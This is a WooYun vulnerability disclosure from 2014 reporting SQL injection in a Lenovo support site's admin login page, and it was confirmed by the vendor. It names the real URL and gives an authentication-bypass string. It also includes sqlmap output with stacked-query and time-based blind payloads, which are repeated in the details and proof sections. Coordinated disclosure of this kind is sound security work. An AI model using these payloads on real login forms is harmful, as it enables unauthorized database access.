当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-084852

漏洞标题:联想某分站注入

相关厂商:联想

漏洞作者: 路人甲

提交时间:2014-11-28 12:31

修复时间:2015-01-12 12:32

公开时间:2015-01-12 12:32

漏洞类型:SQL注射漏洞

危害等级:低

自评Rank:1

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-11-28: 细节已通知厂商并且等待厂商处理中
2014-11-28: 厂商已经确认,细节仅向厂商公开
2014-12-08: 细节向核心白帽子及相关领域专家公开
2014-12-18: 细节向普通白帽子公开
2014-12-28: 细节向实习白帽子公开
2015-01-12: 细节向公众公开

简要描述:

详细说明:

分站地址http://support1.lenovo.com.cn/lenovo/wsi/admin_del/Login.aspx
1:可万能密码秒进 admin' or '1'='1
2:存在注入
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 17:05:10
[17:05:10] [INFO] parsing HTTP request from 'c:\sql.txt'
[17:05:11] [INFO] resuming back-end DBMS 'microsoft sql server'
[17:05:11] [INFO] testing connection to the target url
[17:05:11] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: UserLoginName
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __VIEWSTATE=/wEPDwUKLTk0Njg2ODQyNQ9kFgICAQ9kFggCAw8PFgIeBFRleHRlZGQ
CBw8PFgIfAGVkZAILDw8WAh8AZWRkAhEPDxYCHwBlZGRkliVlK2iKdFDUl5scGPITCOpqSZg=&UserLo
ginName=aa'; WAITFOR DELAY '0:0:5';--&UserLoginPassword=a&ValidateCode=3254&btnS
ubmit=? ?
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __VIEWSTATE=/wEPDwUKLTk0Njg2ODQyNQ9kFgICAQ9kFggCAw8PFgIeBFRleHRlZGQ
CBw8PFgIfAGVkZAILDw8WAh8AZWRkAhEPDxYCHwBlZGRkliVlK2iKdFDUl5scGPITCOpqSZg=&UserLo
ginName=aa' WAITFOR DELAY '0:0:5'--&UserLoginPassword=a&ValidateCode=3254&btnSub
mit=? ?
---
[17:05:11] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[17:05:11] [INFO] fetching current database
[17:05:11] [WARNING] time-based comparison needs larger statistical model. Makin
g a few dummy requests, please wait..
[17:05:19] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based queries
[17:05:30] [INFO] adjusting time delay to 2 seconds due to good response times
wsidb
current database: 'wsidb'

漏洞证明:

分站地址http://support1.lenovo.com.cn/lenovo/wsi/admin_del/Login.aspx
1:可万能密码秒进 admin' or '1'='1
2:存在注入
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 17:05:10
[17:05:10] [INFO] parsing HTTP request from 'c:\sql.txt'
[17:05:11] [INFO] resuming back-end DBMS 'microsoft sql server'
[17:05:11] [INFO] testing connection to the target url
[17:05:11] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: UserLoginName
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __VIEWSTATE=/wEPDwUKLTk0Njg2ODQyNQ9kFgICAQ9kFggCAw8PFgIeBFRleHRlZGQ
CBw8PFgIfAGVkZAILDw8WAh8AZWRkAhEPDxYCHwBlZGRkliVlK2iKdFDUl5scGPITCOpqSZg=&UserLo
ginName=aa'; WAITFOR DELAY '0:0:5';--&UserLoginPassword=a&ValidateCode=3254&btnS
ubmit=? ?
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __VIEWSTATE=/wEPDwUKLTk0Njg2ODQyNQ9kFgICAQ9kFggCAw8PFgIeBFRleHRlZGQ
CBw8PFgIfAGVkZAILDw8WAh8AZWRkAhEPDxYCHwBlZGRkliVlK2iKdFDUl5scGPITCOpqSZg=&UserLo
ginName=aa' WAITFOR DELAY '0:0:5'--&UserLoginPassword=a&ValidateCode=3254&btnSub
mit=? ?
---
[17:05:11] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[17:05:11] [INFO] fetching current database
[17:05:11] [WARNING] time-based comparison needs larger statistical model. Makin
g a few dummy requests, please wait..
[17:05:19] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based queries
[17:05:30] [INFO] adjusting time delay to 2 seconds due to good response times
wsidb
current database: 'wsidb'

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-11-28 16:36

厂商回复:

感谢您对联想安全工作的支持,我们会尽快修复漏洞

最新状态:

暂无